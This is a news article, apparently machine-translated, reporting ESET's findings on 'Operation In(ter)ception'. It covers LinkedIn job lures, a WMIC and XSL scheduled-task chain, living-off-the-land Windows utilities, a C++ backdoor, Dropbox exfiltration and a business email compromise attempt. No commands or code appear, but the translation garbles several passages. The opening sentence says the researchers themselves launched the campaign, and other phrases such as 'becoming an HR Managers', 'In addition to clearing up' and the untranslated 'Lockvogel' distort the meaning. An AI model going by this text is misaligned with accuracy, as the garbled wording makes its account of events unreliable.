Cyber security researchers today launched a new, advanced cyber espionage campaign against aerospace and military organizations in Europe and the Middle East to spy on key employees of target companies and, in some cases, even extract money.
The campaign, which was referred to as "Operation In (ter) ception" in the malware example due to a reference to "Inception", took place between September and December 2019. This emerges from a new report that cyber security company ESET shared with The Hacker News.
"The main goal of the operation was espionage," the researchers told The Hacker News. "However, in one of the cases we investigated, the attackers attempted to monetize access to a victim's email account through a Business Email Compromise (BEC) attack as the final stage of the operation."
The financial motivation behind the attacks, coupled with similarities in the target and development environment, has led ESET to suspect the Lazarus Group, a notorious hacking group that has been commissioned by the North Korean government to fund the country's illegal weapons and missile programs has been.
Social engineering via LinkedIn
ESET stated that the campaign was very targeted and based on social engineering tricks to lure employees working for the selected companies with fake job offers by using LinkedIn’s messaging feature and becoming an HR Managers of well-known companies in the aerospace and defense industries, including Collins Aerospace and General Dynamics.
"Once contact was established, the attackers infiltrated malicious files into communication and disguised them as documents related to the job posting," the researchers said, based on an investigation with two of the European companies affected.
The Lockvogel RAR archive files, sent directly via chats or via email from their fake LinkedIn personas that refer to a OneDrive link, are meant to contain a PDF document listing the salary information of certain positions, even though they actually ran Windows. Command prompt utility to perform a number of actions:
Copy the Windows Management Instrumentation command-line tool (wmic.exe) to a specific folder
Rename it harmless to avoid detection (e.g. Intel, NVidia, Skype, OneDrive and Mozilla), and
Create scheduled tasks that run a remote XSL script through WMIC.
After the actors behind the operation found a first entry into the target company, they deployed a custom malware downloader, which in turn downloaded a previously undocumented second stage payload – a C ++ back door that regularly made demands on the attacker controlled server sends Perform predefined actions based on the commands received and filter the information gathered as a RAR file through a modified version of dbxcli, an open source command line client for Dropbox.
In addition to using WMIC to interpret remote XSL scripts, the opponents also used native Windows utilities such as "certutil" to decode downloaded Base64 encoded payloads, and "rundll32" and "regsvr32" to run their custom malware.
Financially motivated BEC attacks
In addition to clearing up, ESET researchers also found evidence of attackers trying to use the compromised accounts to extract money from other companies.
Although this was unsuccessful, the monetization tactic worked using the existing email communication between the account holder and a customer of the company to pay a pending invoice to another bank account that is under their control.
"As part of this list, the attackers registered an identical domain name as the compromised company, but on a different top-level domain, and used an email associated with this fake domain for further communication with the target customer," said ESET.
Ultimately, the target customer reached the victim's correct email address regarding the suspicious email, thereby frustrating the attacker's attempt.
"Our studies on Operation In (ter) ception once again show how effective spear phishing can be to jeopardize a target of interest," the researchers concluded.
"They were very targeted and trusted social engineering via LinkedIn and custom, multi-tier malware. To work under the radar, attackers often recompiled their malware, misused native Windows utilities, and pretended to be legitimate software and businesses."